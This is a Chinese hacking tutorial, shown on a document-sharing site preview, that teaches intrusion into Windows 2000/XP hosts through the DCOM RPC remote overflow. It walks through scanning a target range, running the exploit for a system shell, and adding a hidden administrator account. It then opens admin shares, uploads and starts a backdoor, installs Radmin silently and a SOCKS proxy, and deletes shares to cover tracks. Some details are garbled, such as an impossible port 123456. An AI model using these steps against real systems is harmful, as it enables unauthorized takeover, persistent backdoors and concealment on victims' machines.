利用dcomrpc远程溢出漏洞入侵主机_第1页
利用dcomrpc远程溢出漏洞入侵主机_第2页
利用dcomrpc远程溢出漏洞入侵主机_第3页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、利用dcomrpc远程溢出漏洞入侵主机最近,网上非常流行dcomrpc,那今天我们就教你详细的利用dcomrpc入侵。和入侵之后必须做什么。 需要的工具: 很好的: radmin.EE 扫描工具: retinarpcdcom.EE 溢出攻击工具:RpcDcom(通用溢出工具) 脚本开启 telnet工具:telnet.vbe opentelnet.EE resumetelnet.EE 代理:sksockserver.EE 后门程序:WinEggDropShellPro3thVersion 好了,该做的都做的差不多了。 先使用retinarpcdcom.EE扫描一个网段。查找有rpc漏洞的机子,

2、这个漏洞需要135端口开放,(想必 随便扫一下就会发现有许多主机开放的135端口) 211.217.50.xx 第一个主机就被扫出来又此漏洞。 看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2k server版本展开命令行: 查看dcomrpc的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpc RPC DCOM Expl01t coded by .:oc192.us:. Security Complied and Modi

3、fied by Expl01t Usage: dcomrpc -d <host> options Options: -d: Hostname to attack Required -t: Type Default: 0 -r: Return address Default: Selected from target -p: Attack port Default: 135 -l: Bindshell port Default: 666 Types: 0 0x0018759f: Win2k-Universal 1 0x0100139d: WinXP-Universal 开始进行溢出:

4、 F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0 RPC DCOM remote expl01t - .:oc192.us:. Security Complied and recorrected by Expl01t + Resolving host. + Done. + Expl01ting.Just wait. 等到出现,说明溢出成功 c:/winnt/system32> 接着我们建立用户 c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。 把用户添加成超级管理员 c:/winnt/

5、system32>net localgroup administrators blueye$ /add 命令成功完成。 看看共享开了没有没有的话把共享开开 c:/winnt/system32>net share 清单是空的。 c:/winnt/system32>net share ipc$ 命令成功完成。 c:/winnt/system32>net share admin$ 命令成功完成。 到这里我们入侵告一段落 建 立 IPC$ 连 接 ,也可以使用tftp上传 ,先和对方建立连接 F:/hack>net use /211.217.50.xx/ipc$ &quo

6、t;1111" /user:blueye$ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里 F:/hack>copy d:/inject.EE /211.217.50.xx/admin$/system32 F:/hack>copy d:/tback.dll /211.217.50.xx/admin$/system32 然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet 使用opentelnet.EE 关闭开启的telnet使用resumetelnet / /ip user password 如果忘记开共享可以使用脚本

7、开启 telnet来开共享,用法: cscript telnet.vbe ip user password null port (null是验证方式) F:/hack>opentenet /211.217.50.xx blueye$ 1111 1 4567 F:/hack>telnet 211.217.50.xx 4567 (省略) 连接并运行后门程序运行后门程序命令 根目录:inject.EE -run (后门使用方法和安装都在zip文件里面包含了) 后门端口123456 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDr

8、opShell Matrix Version Melody 下面安装radmin,配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章。 radmin.reg raddrv.dll admdll.dll r_server.EE 把这个4个文件copy c:/winnt/system32 在目录下面执行命令 c:/winnt/system32>r_server /s radmin.reg -导入注册表 c:/winnt/system32>r_server /install /silence -安装radmin.并且不显示托盘 c:/winnt/system32&

9、gt;net start r_server - 启动服务 安装sock代理 把sksockserver.EE copy c:/winnt/system32 c:/winnt/system32>sksockserver /install -安装服务 c:/winnt/system32>sksockserver -config port 1234 -端口定在1234 自己可以改 c:/winnt/system32>sksockserver -config starttype 2 -开机自动启动 c:/winnt/system32>net start skserver -启动

10、服务 最后删除共享 net share ipc$ /del net share admin$ /del 在安装radmin的时候你发现有人已经安装了。 看操作 (我输入的内容) 后门连接 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody #(pslist) Melody #(pskill r_server) Melody #(shell) c:/winnt/system32>(del r_server.EE) c:/winnt/system32>(del admdll.dll) c:/winnt/system32>(del raddrv.dll) copy你自己的上去,然后安装 省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论